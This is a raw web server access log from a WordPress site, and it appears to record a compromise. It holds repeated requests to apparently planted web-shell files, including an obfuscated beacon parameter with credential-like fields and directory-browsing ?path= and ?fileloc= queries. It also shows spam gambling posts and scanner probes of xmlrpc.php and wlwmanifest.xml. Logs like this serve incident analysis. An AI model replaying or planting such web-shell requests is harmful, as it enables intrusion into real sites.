142.4.205.1 - - [16/Oct/2025:15:57:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383235312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634343635312q6333363536633339393333663534616239393666383939306632353430373737222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
158.255.80.210 - - [16/Oct/2025:15:58:42 -0400] "POST /xmlrpc.php HTTP/1.0" 500 5281 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
142.4.205.1 - - [16/Oct/2025:15:57:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383237312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634343637312q3731376332336430643633366633373163353762306363366635336665316362222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.197 - - [16/Oct/2025:15:58:55 -0400] "GET /?_g=369183 HTTP/1.0" 200 23450 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:15:58:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383239312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634343639312q3463363434353937336634313964663661633863366434373965666563333631222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.131.235 - - [16/Oct/2025:15:59:22 -0400] "GET /2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/themes/twentynineteen/js HTTP/1.0" 200 7284 "https://academiedumarketing.com/2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/themes/twentynineteen" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:15:58:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383331312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634343731312q3837323663646637313134363437323838633535316162653865343531643764222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:15:58:19 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:15:58:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383333312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634343733312q3532393133386130356232613933653130633236643534356132396536656237222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:15:59:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383335312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634343735312q3532383965346633386462363133353633666265326566313639346436353266222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:15:59:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383337312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634343737312q6230376632333734386139386433386230336232366537376262333432643761222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.197 - - [16/Oct/2025:16:00:41 -0400] "GET /?_g=2131126 HTTP/1.0" 200 24388 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:15:59:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383339312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634343739312q3561316334343062323932336363626235613234306263366331626234313231222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.146.77 - - [16/Oct/2025:16:00:51 -0400] "GET /2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-admin/js HTTP/1.0" 200 10325 "https://academiedumarketing.com/2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-admin" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
18.211.148.239 - - [16/Oct/2025:16:01:09 -0400] "GET /2025/10/03/best-strategies-for-togel-players/?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-cron.php&path=/var/www/vhosts/academiedumarketing.com/public_html HTTP/1.0" 200 8761 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:16:00:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383431312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634343831312q3534363261323131376464626433353961643934376235333136306661376339222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
23.23.104.107 - - [16/Oct/2025:16:01:14 -0400] "GET /2025/10/03/best-strategies-for-togel-players/?path=/var/www/vhosts/academiedumarketing.com/public_html/aAqlKLnxmZitXs HTTP/1.0" 200 7207 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
69.197.179.242 - - [16/Oct/2025:15:59:49 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:16:00:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383433312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634343833312q3434366261613834643938656234346531613261333765653866626233356661222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:16:00:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383435312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634343835312q6662646466356530376430663238346632666635303838353632313932343839222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.129.33 - - [16/Oct/2025:16:02:08 -0400] "GET /2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-admin/includes HTTP/1.0" 200 10941 "https://academiedumarketing.com/2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-admin" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:16:01:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383437312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634343837312q6332373361633438346166326231393563613139396239663134633937316664222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
146.59.127.80 - - [16/Oct/2025:16:02:13 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/index1.php&path=/var/www/vhosts/academiedumarketing.com/public_html HTTP/1.0" 200 8351 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:16:01:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383439312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634343839312q3831363132633964643336303366373139613130393134366266393233313461222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.196 - - [16/Oct/2025:16:02:42 -0400] "GET /?_g=2294950 HTTP/1.0" 200 24314 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.179.242 - - [16/Oct/2025:16:01:20 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:16:01:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383531312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634343931312q3065656362393532313436656232333838306130623334313362333432303734222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.195 - - [16/Oct/2025:16:02:51 -0400] "GET /?_g=2516292 HTTP/1.0" 200 25469 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.77.211.229 - - [16/Oct/2025:16:02:57 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-links-opml.php&path=/var/www/vhosts/academiedumarketing.com/public_html HTTP/1.0" 200 7800 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:16:02:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383533312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634343933312q6336333864363266653732363537633564646466633232626635333962643434222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
43.156.204.134 - - [16/Oct/2025:16:03:17 -0400] "GET /?path=/var HTTP/1.0" 200 6660 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
142.4.205.1 - - [16/Oct/2025:16:02:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383535312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634343935312q3233626432376534326138653765343836313462643361396263616362623865222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.145.188 - - [16/Oct/2025:16:03:33 -0400] "GET /2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/social-links HTTP/1.0" 200 7347 "https://academiedumarketing.com/2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:16:02:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383537312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634343937312q3865393432356262316361633761623930373761333764313836363963363636222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.195 - - [16/Oct/2025:16:03:52 -0400] "GET /?_g=1480803 HTTP/1.0" 200 24942 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:16:03:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383539312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634343939312q3466326632613563613133383234613639383638313837623534376136396233222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:16:02:52 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.65.195 - - [16/Oct/2025:16:04:20 -0400] "GET /?_g=685781 HTTP/1.0" 200 25762 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:16:03:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383631312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353031312q3936393466636635613534316138653330393935363564623563366134373262222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:16:03:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383633312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353033312q6561303839343262313137653666383733666263353263303861623330626361222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.128.196 - - [16/Oct/2025:16:04:55 -0400] "GET /2025/10/04/rahasia-sukses-togel-online-2025-2/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/uploads/2021/06 HTTP/1.0" 200 6776 "https://academiedumarketing.com/2025/10/04/rahasia-sukses-togel-online-2025-2/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/uploads/2021" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:16:04:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383635312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353035312q3430323465316136666234613966353931663632656665373133306564666137222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.197 - - [16/Oct/2025:16:05:14 -0400] "GET /?_g=163928 HTTP/1.0" 200 24166 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.196 - - [16/Oct/2025:16:05:19 -0400] "GET /?_g=2642626 HTTP/1.0" 200 24703 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
113.172.232.243 - - [16/Oct/2025:16:05:27 -0400] "GET /?sitemap526.xml HTTP/1.0" 200 8675 "-" "cc_bot"
142.4.205.1 - - [16/Oct/2025:16:04:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383637312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353037312q6230313764656163393265623538373834366266623637613838396562343766222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.195 - - [16/Oct/2025:16:05:42 -0400] "GET /?_g=1242416 HTTP/1.0" 200 25174 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.179.242 - - [16/Oct/2025:16:04:21 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:16:04:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383639312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353039312q3332626437333662373061393961633661356634633537636238333465646261222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:16:05:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383731312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353131312q3464376237373839646639303366356561633336343436313133643335323537222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.196 - - [16/Oct/2025:16:06:14 -0400] "GET /?_g=1534303 HTTP/1.0" 200 24616 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
146.70.194.236 - - [16/Oct/2025:16:06:22 -0400] "GET / HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
146.70.194.236 - - [16/Oct/2025:16:06:24 -0400] "GET //wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
146.70.194.236 - - [16/Oct/2025:16:06:24 -0400] "GET //xmlrpc.php?rsd HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
146.70.194.236 - - [16/Oct/2025:16:06:26 -0400] "GET / HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
146.70.194.236 - - [16/Oct/2025:16:06:26 -0400] "GET //blog/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
146.70.194.236 - - [16/Oct/2025:16:06:27 -0400] "GET //web/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
146.70.194.236 - - [16/Oct/2025:16:06:28 -0400] "GET //wordpress/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
146.70.194.236 - - [16/Oct/2025:16:06:29 -0400] "GET //website/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
201.49.205.223 - - [16/Oct/2025:16:06:29 -0400] "GET /?sitemap597.xml HTTP/1.0" 200 8667 "-" "cc_bot"
146.70.194.236 - - [16/Oct/2025:16:06:30 -0400] "GET //wp/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:16:05:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383733312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353133312q3239333637666631353061343862373530366661333031636332633037613261222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
146.70.194.236 - - [16/Oct/2025:16:06:30 -0400] "GET //news/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
66.249.65.195 - - [16/Oct/2025:16:06:31 -0400] "GET /?_g=2633036 HTTP/1.0" 200 25087 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
146.70.194.236 - - [16/Oct/2025:16:06:31 -0400] "GET //2018/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
